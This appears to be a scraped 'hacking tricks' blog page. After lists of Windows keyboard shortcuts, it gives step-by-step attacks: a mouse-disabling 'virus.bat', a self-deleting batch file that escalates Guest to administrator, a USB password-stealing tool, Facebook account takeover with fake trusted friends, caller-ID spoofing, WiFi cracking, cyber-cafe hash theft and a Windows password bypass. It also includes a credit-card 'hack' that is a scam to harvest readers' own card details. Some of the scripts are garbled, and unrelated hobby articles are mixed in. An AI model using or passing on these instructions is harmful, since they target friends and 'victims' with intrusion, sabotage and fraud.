CTRL+UP ARROW Move the insertion point to the beginning of the previous paragraph
SHIFT+DELETE Delete selected item permanently without placing the item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in a window or on the desktop
F10 Activate the menu bar in the active program
SHIFT+F10 Display the shortcut menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task Manager
SHIFT when you insert a CD Prevent the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System Properties dialog box
WIN+D Minimizes all Windows and shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items




Windows Explorer Shortcuts:

Quote:
ALT+SPACEBAR - Display the current window’s system menu
SHIFT+F10 - Display the item's context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you last used
ALT+F4 - Close the current window or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to a previous view
ALT+LEFT ARROW - Move backward to a previous view
SHIFT+DELETE - Delete an item immediately
BACKSPACE - View the folder one level up
ALT+ENTER - View an item’s properties
F10 - Activate the menu bar in programs
F6 - Switch between left and right panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item




Internet Explorer Shortcuts:

Quote:
CTRL+A - Select all items on the current page
CTRL+D - Add the current page to your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or active frame
CTRL+S - Save the current page
CTRL+W - Close current browser window
CTRL+ENTER - Adds the http://www. (url) .com
SHIFT+CLICK - Open link in new window
BACKSPACE - Go to the previous page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a document
TAB - Move forward through items on a page
END - Move to the end of a document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page focus
ALT+RIGHT ARROW - Go to the next page
SHIFT+CTRL+TAB - Move back between frames
SHIFT+F10 - Display a shortcut menu for a link
SHIFT+TAB - Move back through the items on a page
CTRL+TAB - Move forward between frames
CTRL+C - Copy selected items to the clipboard
CTRL+V - Insert contents of the clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a document
END - Move to the end of a document
F1 - Display Internet Explorer Help


want to hack facebook? just click here 

WINDOWS 8- HACKS AND TWEAKS

WINDOWS 8- HACKS AND TWEAKS

Create a new plain text document
on your
desktop or another location.
You can do so with
a right-click and the selection of New
> Text
Document from the context menu.
Add the following contents to the
new document
and save it afterwards:
[Shell]
Command=2
IconFile=Explorer.exe,3
[Taskbar]
Command=ToggleDesktop
Rename the text document to
metro.scf. P
Make sure the .txt extension gets
removed in the process.
You can verify that by comparing
the icon before and after the
renaming: it should be different
after you have renamed it.
Now it is time to add the file as a
Task to the Task Scheduler.
The easiest way to open the
Windows
Task Scheduler is to press the
Windows-key to
get into Metro (how ironic), enter
schedule,
switch to the settings filter on the
right, and select
the scheduler from the results
listing.
Select Task
Scheduler Library in the new
window, right-click in the task listing,
and pick the create
new task option from the context
menu.
Enter a name for the task,
e.g. Metro, and switch to the triggers
tab.
Click on the add button here and
select at log on in the begin the task
menu at the top of the new window.
Switch to the actions tab afterwards,
select
browse, and then the metro.scf file
that you have
created previously.
When you restart Windows 8 now,
the operating
system should automatically bypass
the Metro interface.
On most PCs,
This will work

latest Computer a virus that disable Mouse

latest Computer a virus that disable Mouse

Open Notepad and copy
below codes
rem ———————————
rem Disable Mouse
set
key=”HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass”
reg delete %key%
reg add %key% /v Start /t
REG_DWORD /d 4
rem ———————————

Save this file as virus.bat

How to Hack PC from USB

How to Hack PC from USB

Here is the small tricks for
stealing information or
passwords of your friends or
enemies using pendrives (USB)..
First Download this application(527 KB)
from here .→ www.mediafire.com/?f3ddzyenlug ←
1. Extract it.
2. Open pcinfo
3. Select all the files and paste
it in your USB (pendrive).
4. Give pendrive to your friend to upload some data in it.
And now open the dump folder
in your PC and you will have
all the info you want.

Hack Facebook Chat History of Your friend

Hack Facebook Chat History of Your friend

This is a simple and easy
Trick to Hack Facebook Chat
History. We can Hack Chat
History even if our Friends are
Offline.
To use this Trick follow the
simple steps given below br/>
1) Open Friends profile.
2) Right Click on the Poke and
Select Copy Link Location. Now
we have the ID in our
Clipboard.
3) This will exactly look like
span style=”color: red;”>
http://www.facebook.com/
profile.php?id=XYZ
( where XYX can be any
numbers and this XYZ is
nothing but the ID).
4) Now in the Address Bar type
” javascript:Chat.openTab
(XYZ) ” (without qoutes) and
press Enter.
5) Now it’s done.
6) You can see full Chat History
now.
Enjoy.. Stay tuned with us also
don’t forget to hit like..
NOTE:-

This trick isn’t working in US,Chaina and some other Countries .

Call someone from his own number [Not Free]

Call someone from his own number [Not Free]

1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in “Phone number “field.
3.Complete registration and confirm your email id and then login to your account.
click on “Direct WebCall”.
4.You will arrive at page shown below. In “Enter a number” box, select your country
and also any mobile number(you can enter yours)
6. Now, simply hit on “Call Now”
button to call your friend with his own number.
7. That’s it. Your friend will be shocked to see his own number calling him
[You can change one victim's number to another]

How to delete Undeletable virus file ?

How to delete Undeletable virus file ?



1] Open Notepad.exe
2] Click File>Save As..>
3] locate the folder where ur undeletable file is
4] Choose ‘All files’ from the file type box
5] click once on the file u wanna delete so its name appears in the ‘filename’ box
6] put a ” at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)
7] Cick save,
It should ask u to overwrite the existing file, choose yes and u can delete it as normal

How To Hack Skype Account Password for Free

 How To Hack Skype Account Password for Free


This advanced  program will help you to hack the password of a  Skype account. Everything you need to know is  their e-mail address or use name and you will be able to access the account users. This program will be used to  retrieve your password and  Skype accounts, to help a friend with them to get their consent or for parents to keep an eye on the accounts of their children. If the password  for Skype hacking top of it, you are responsible  for your own actions.

With that being said, the program hack Skype password is fairly simple to use. In the first text box you will insert the username for the account or if you’re unable to figure that out, you can input the profile id which is usually like a 9 digit number sequence but can often be word or words set by the profile owner. You can find this number by looking at the URL when you visit the program.

After you’ve got the first text box filled, set the password in the next two boxes. I’m well aware that you could simply use the program again in order to change the password if you didn’t input it correctly; however, to make it a more practical program you’ll need to verify that you typed it correctly. Finally, hit the "Change" button. This will begin the process of logging you in and changing the password. When it has completed the task, you will be notified with a message box informing you it has completed and that you can now log in.
Use the Hack Skype Password program responsibly. You are responsible for your own actions. Don’t go around causing too much trouble at your school, work, or household.

I really hope this article has helped you to get a step closer to actually hacking SKYPE account passwords for legitimate reasons

Send an Arduino to the moon for $300

Send an Arduino to the moon for $300

sat
This time,  you can break the bonds of Earth and send your own Arduino compatible satellite on a collision course with the moon. The project is called Pocket Spacecraft, and exactly as its name implies, it allows you to send a small, flat, 8 cm diameter spacecraft to the surface of the moon.
The pocket spacecraft are made of metallized kapton, a very thin membrane stretched inside a loop of wire. On board this paper-thin spacecraft are a pair of solar cells and a bare die MSP430 microcontroller connected to a suite of sensors. Before launch, you can program your tiny space probe with commands to relay data back to Earth, either useful scientific data or a simple tweet.
These pocket spacecraft will be launched from a cubesat – a highly successful line of amateur spacecraft that are usually launched by hitching a ride with larger commercial satellites. To get from low Earth orbit to the moon is much harder than just hitchhiking, so the cubesat mothership comes equipped with either a solar sail or its own engine that electrolysed water into hydrogen and oxygen, the perfect rocket fuel.
Pocket Spacecraft is an amazingly impressive feat; there are literally dozens of amateur-built spacecraft orbiting above our heads right now, but so far none have ventured more than a few hundred miles away from their home planet. Getting to the moon with an amateur spacecraft is an amazing accomplishment, and definitely worthy of the $300 price tag.

Aux-in Hacking an 04 Subaru Radio


Aux-in Hacking an 04 Subaru Radio

Like many of our cars, does not offer any kind of auxiliary input, and aux-in/mp3 adapters tend to run on the not so cheap side of the price scale. Even a replacement head unit was too rich for his blood. So it was time to wire something to the old head unit. On inspecting the radio’s PCB I managed to locate the traces that carry audio from the FM receiver to the stereo’s amplifier.  Most aux input hacks we have seen involve fooling the stereo into thinking some media is inserted, even if interfacing with the audio lines on the PCB. These require that the tape/CD functionality be altered, perhaps permanently. Even worse you may have to shlep around a blank CDR with a bunch of tracks on it! All just to fool the stereo into enabling audio output.
Instead I target the audio lines from the FM stereo, since radio is always enabled when active. Once the audio traces are located they are severed  and bypassed with a 1/8″ stereo plug. This setup allows the FM audio signal to pass through the connector when disconnected, and cuts off any radio audio once your mp3 player is.

Wifi password Hacking

Wifi password Hacking

 

First we need three things.
1. A USB pen drive.
2. beini.iso file.
3. UNetbootin software to make your USB drive bootable.
WiFi Software Download Link 
                                                            BEINI ISO FIlE
                     
                                        >>>>>> Click Here To Download <<<<<<<
                                                    
                                                             USB UNetbootin Software
                                                             
                           
                                         >>>>>> Click Here To Download <<<<<<< 

After download is complete 
1. Write beini.iso on your USB by UNetbootin. Set everything according to this image bellow.
2. After finishing restart your PC and boot it from your USB.
3. If you were successful to boot up then you should see something like this. Click Minidwep-gtk.
4. Click OK.
 
5. Now Minipwep-gtk  program will open. Click Scan.
 
6. Select a wireless network(should have Clint) from the list. And click Lunch to start creaking process.
 
7. Sometimes its take a while according to your victim connections IVS value and password strength. So keep passions.
 
8. If it found a password, it should appear like this.
 
To creak WPA/WPA2 follow this image instruction.
 
Let me know if you have done it successfully or you have any complicity.


Hack Administrator from Guest

Hack Administrator from Guest



Hack Administrator Account from Guest Account.Yes!! that is quite possible.All you need to do is to follow the below procedure.


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...

-----------------------------------------

ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.



EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Hack Facebook Account

Hack Facebook Account


    There are various methods to hack facbook account password like Keyloggers, Phishing websites etc.. whereas bruteforcing, dictionary attacks, DDOS attack etc will not work directly due account lockout feature. Today in this post I am going to share a very effective way to hack facebook account I named it Hacking with Trusted Friends.
    Hacking of Facebook Account with Trusted Friends is also not so simple. To get started with it, you have to create three fake Facebook accounts and make sure they are in friend list of the person whose facebook account you are going to hack. If you can make this happen then roll up your sleeves to begin the real action.

Warning: The Sole purpose of this article is to highlight the loophole in security. I am not responsible if you use it with malicious intentions and get caught..!!

    It is only for educational purposes. Don’t use it with wrong intension.

How to Hack Your Friend’s Facebook Account:


  • First of all, create three new Facebook Accounts and add all these three accounts in your friend’s friend list. If you are done with the first step then you have done 90% of your work.
  • Click on Forgot your Password button. It will show three options to recover your password.
  • In the first option give his Email Address and in the Name field give your Friend’s Full Name, your name and click on Search button.
  • Now if everything goes well you will see the profile picture of that person. Here click on the No longer have access to these.
  • Now Enter your New Email address which doesn’t associated with any facebook account yet and click on Submit button.
  • Now you will be prompted to Security question. If you know the answer then it is well and good otherwise, give wrong answers for three times.
  • Now after three unsuccessful attempts, it will ask you to recover your account with trusted friend feature. Click on Continue button.
  • It will ask you to choose three friends. Select your created accounts from the list and click on Continue button each time.
  • After selecting three friends, Facebook will send security codes to the Email address associated with those fake accounts. Login to each account and fill the security codes in the same manner. Also check spam messages if it is not there.
  • Now you will get password Reset Email on Email Address that you have entered in 5th step (New Email address which doesn’t associated with any facebook account).
    That’s it..! You have hacked your friends Facebook Account. Enjoy..!!

How To Hack Valid Credit Card Numbers With CVV Numbers

How To Hack Valid Credit Card Numbers With CVV Numbers

Before going shopping online, every customer has to register online with his/her credit card information and they'll leave their emails too so that those shopping websites will confirm their registration. For those online shoppers who used yahoo emails, their credit card info is automatically stored in the yahoo server when the companies send to them confirmation emails. However, there is a BIG bug in the server that those people's credit card information can be retrieved by any random email user who has a VALID credit card. To simplify this, here is how it works:

Send an Email to confuse a yahoo server mailbot, so that it will return to YOUR EMAIL with complete information on people's credit card information stored in the server in the last 72 hours. This is how you will get people's VALID credit card information. Now you have to do exactly the same as follows:

EDIT: removed redundant information

expiration date (This is line 35, has to be LOWER CASE letters) 0000000000000 (This is line 36, put a zero under each character, number, letter, hyphen, etc)

E-mail(This is line 47, has to be LOWER CASE letters) 0000000000000 (This is line 48, put a zero under each character, number, letter, hyphen, etc)

252ads (This is line 51)

Return-Path: (This is line 54, type in your email between ) s_

You have to make sure you do EXACTLY as what is said above and the credit card info above the 0000 are absolutely CORRECT/VALID. Valid, meaning one that is registered in your major credit card database.

For those who like to play it safe, thinking this is too good to be true. Get this; the card number you use as bait can be one that has been discontinued (canceled). However, it cannot be expired and the card information must be correct. If it is expired and the information incorrect, you will simply get back No data retrieved & #8221; as a reply. And you thought those canceled credit cards you keep in your wallet, just because they're pretty, were useless.

Here is a sample email: (CAUTION! This is only example, and the card is INVALID, to get the whole thing to work, you MUST use a VALID credit card as bait.

Send to: <removed>

Subject: accntopp-cc-E52488

Email body:

boundary='0-86226711-106343'

Content-Type: text/plain; charset=us-ascii

4013993145565451
0000000000000000

jesse d banks
00000000000

523
000

2537 Stillwell rd.,des moines
00000000000000000000000

ia, usa, 50567
0000000000

901-834-4183
000000000000

visa
0000

03/2006
0000000

<email removed>
000000000000000000000

252ads

Return-Path

Once again, you have to make sure that you DO NOT COPY THE SAMPLE EMAIL ABOVE, because it will NOT work!!! It is there to help you set it up. Instead, you MUST provide A VALID AND CORRECT CARD, otherwise you will NOT get the information you want.

How To Hack PC On Cyber Cafe | Hack A Closed Pc On Cyber Cafe

How To Hack PC On Cyber Cafe | Hack A Closed Pc On Cyber Cafe

here is a quick new hack on how to intrude in the PC which is shut downed at Cyber cafe. (Don’t Forget to read our disclaimer at the bottom of the post.)
1. As you all must have know these days all Cyber cafe owners have a program for administration to control all PC’s in local area network. So all files can be inter transmitted.
2. First of all press Ctrl+Alt+Del the task manager or any controlling application, will open. Then from APPLICATIONS select the program that is controlling all PC’s  & terminate it, This is for security reason. Now log of PC, & you ll get user names of the PC.
3. But some times, cyber cafes have security clients installed that have restricted access to Task Manager
, restart the computer & press F8 continuously before windows boots.
The Menu will open, select Safe Mode from it. And now you can copy files from networked PC’s without any  security layer.
Next step is where you’ll need to crack the hashes.  SO go to your home PC , Download & install Saminside cracking tool. And from some another Cyber cafe try to crack the hashes of that PC. By same log off method explained below.
This where you actually perform hacking. Have a gret time & tell us weather it worked for you.
Meanwhile if you can get IP address,  of the PC you wish to hack try to get it from ip-explorer.com, but this is not the part of this hack its sort of next step of hacking from outside the network.
Disclaimer : The trick here explained it for educational purpose only & not to  perform illegal or criminal activities. Don’t forget hacking into some one’s privacy is considered as crime. SO do it on your home network that you own or something.  We are not responsible for anything you do & consequences of it by using our articles.

OperaMini Free Airtel Gprs Tricks April 2012

OperaMini Free Airtel Gprs Tricks April 2012

Hello To All Friends After My Super Popular Trick

Optimizing Internet Connection Using Internet Cyclone - Increase Internet Speed in Windows

. Our Team Will Tell You About Free Gprs Trick April 2012 on Airtel . I am give you Free Airtel Gprs Tricks . How To Hack Airtel Gprs Using OperaMini ? Ok Let's Follow Some Few Steps For Do This .


1. First You Need Create New Setting In Your Mobile Phone

Apn - airtelgprs.com

Proxy Address - 141.000.011.253

Port - 80


2. Now You Open Operamini Handler And Use Following Given Below Settings

Proxy Type - Http

Proxy - mocricket.com Or fb.me

That's it Now You Are Done .

DATA CARD Free Recharge Trick - MTS Mblaze Free 3G Data Card Hacking Trick

DATA CARD Free Recharge Trick - MTS Mblaze Free 3G Data Card Hacking Trick


Hello To All Daily Hacking Tips Readers  . I hope all are fine . in past i have post lots of tricks for Various types networks and today i am going to first time to post trick free for MTS Mblaze Data card 2012 . So Guys Follow Given below Steps For Do this .



This Trick Only For Getting 150 MB 3G Data Free in your MTS Mblaze Datacard .

1. First you Go To MTS Official website

2.  Now You Left Side Click on Get Free Data .





3. in Next Step Fill your Name , Email Address , Mobile Number Then Click On Submit Button .




4. After Sometime your will get details through your email address for claiming the free data .



Note - This Free Recharge only For Prepaid Customers .


That's it Guys Enjoy :)

How you can hack and change Windows 7 password by using command prompt


Today I am  showing you , How you can hack and change Windows 7 password by using command prompt .
        WITHOUT KNOWING THE PREVIOUS OR ACTUAL PASSWORD

Today I am giving you one trick . Next day I will give you another one. 
Lets Start…….
                         First of all you need to open the pc with the help of the administrator . Then install  UNLOCKER 1.9.0
[This one you can download from here   >>>UNLOCKER1.9.0<<<<]
Aftar installing follow steps.



Then Open computer>c:>windows>system 32>Utilman.exe



Click right to the Utilman.exe file and open by Unlocker .



Aftar that a  dialogue box will open.



See more ,Continue ....





Copyright © 2015 TechElectro - Blog
| Distributed By Mishu